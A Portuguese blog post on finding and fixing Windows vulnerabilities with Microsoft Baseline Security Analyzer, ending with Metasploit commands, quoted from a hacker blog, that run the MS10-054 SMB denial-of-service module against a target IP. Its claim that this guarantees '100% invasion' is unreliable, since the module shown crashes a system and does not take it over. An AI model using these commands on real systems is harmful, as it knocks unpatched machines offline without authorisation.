É muito importante você está atento, as vulnerabilidades do seu computador, a maioria das invasões aos computadores é pela falta de atualização do sistema operacional. Todo mês um Hacker descobre uma vulnerabilidade nova, para explorar, procurando dominar a sua maquina remotamente, através de exploits que exploram os Backdoor (também conhecido por Porta dos fundos) é uma falha de segurança que pode existir em um programa de computador ou sistema operacional, que deixa uma porta aberta para invasão.
1. Passo - Depois de instalar a ferramenta, faça um escaneamento na sua maquina, clicando no link do sistema “Scan a computer”.
2. Passo – Selecione o nome do seu computador ou IP, se preferir selecione as opções, no meu caso todas estão marcadas e por fim click “Start Scan”, agora espere terminar o escaneamento, uma observação tem que está com a internet ligada, porque ele vai tentar atualizar o repositório, checando as atualizações.
3. Passo – Depois de realizar o escaneamento, vai mostrar um relatório, com todos os detalhes, clicando em “Result details”, mostrar detalhes das vulnerabilidades, como mostra a figura 4.
4. Passo – Ao clicar em Result Details na tela anterior, vai aparecer as vulnerabilidades abaixo, ao clicar na vulnerabilidade vai abrir o site da Microsoft.
5. Passo – No site da Microsoft você poderá ler detalhes da vulnerabilidade, sistemas que ela afeta, e clicar no link para baixar a correção.
6. Passo – Baixar a Correção da vulnerabilidade MS10-054.
A ferramenta é muito boa para analisar as vulnerabilidades do Sistema Operacional, também tem a opção de escanear vários computadores em rede, sendo necessário uma senha de Admistrador de Rede, é sempre bom prevenir futuros ataques a seu PC ou a sua Empresa, mostramos uma boa prática a ser adotada de prevenção de ataque.
Site do Microsoft Baseline Security Analyzer:
Download da Ferramenta que verifica a existência da Vulnerabilidade:
Exploração da Vulnerabilidade acima citada, tirada de um blog Hacker, só para mostrar a seriedade do problema, é 100% garantida a invasão sem a correção ou sem uma ferramenta de proteção.
With Command :
Code:
msf > use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow![[Image: d381yuc.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sJ4nkFJY2-QUN4SY1xlBUDqxYd6nM-72wRosBIdVuPayNHM6BqXBjcNx4XSEhFJmsCO6sAGUarF_Gxs5nCJyPuqA=s0-d)
Code:
msf > set RHOST [target IP]![[Image: A5JUiuX.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uK29J6gZB9dZ4rx7fVB3D3-Ey8WnZb9GvzG1bAYokBrgB4F9B2Jlm80zHQAppDmqrql_dm01rPQ5rFf3jEDHy3=s0-d)
Code:
msf > set SMBSHARE [The Name Of Folder Will You share]![[Image: wlUzVv0.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_trj6F-sNpcPkQDKf_U8JYXjYwN2eIll9N1CnFSuI-KTPJBV1HxKz5FOymNf9b8CvkysnmGkHGWJJiuvgbN9C9Cew=s0-d)
Code:
msf > exploit![[Image: t1j3trG.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uE6571K8u79UvKkLYrpryX-lurJWlKpEljeMNVtgU_zvQTU5YqHat4aSgzQJxuvxXtxwzI0-A3aJk1TUXXQGwZ=s0-d)
